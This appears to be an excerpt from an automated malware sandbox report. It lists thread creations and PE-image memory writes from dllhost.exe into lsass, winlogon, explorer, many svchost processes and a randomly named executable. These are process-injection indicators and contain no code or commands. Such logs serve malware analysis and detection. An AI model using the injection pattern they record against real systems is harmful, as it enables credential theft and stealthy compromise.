                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C521CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9121CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5B21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EF21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EE21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F421CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7921CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F521CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8C21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C521CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12121CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DA21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1B412AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1B9F2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 38862AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\conhost.exe EIP: 2F792AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Users\Public\Deadsvchost.exe EIP: 21B42AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\schtasks.exe EIP: 3BB52AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E00B2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 562AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 942AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11C2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CEF02AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CEF62AB8Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAF1E0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108B940000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166930000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8BA0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DB0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 151C5AA0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F8FD0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16BF33D0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1A348770000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2FB0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1F3EAD60000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 18686DD0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 24F4DB10000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27E6F950000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 15B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1310000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 14C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 870000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000 value starts with: 4D5A
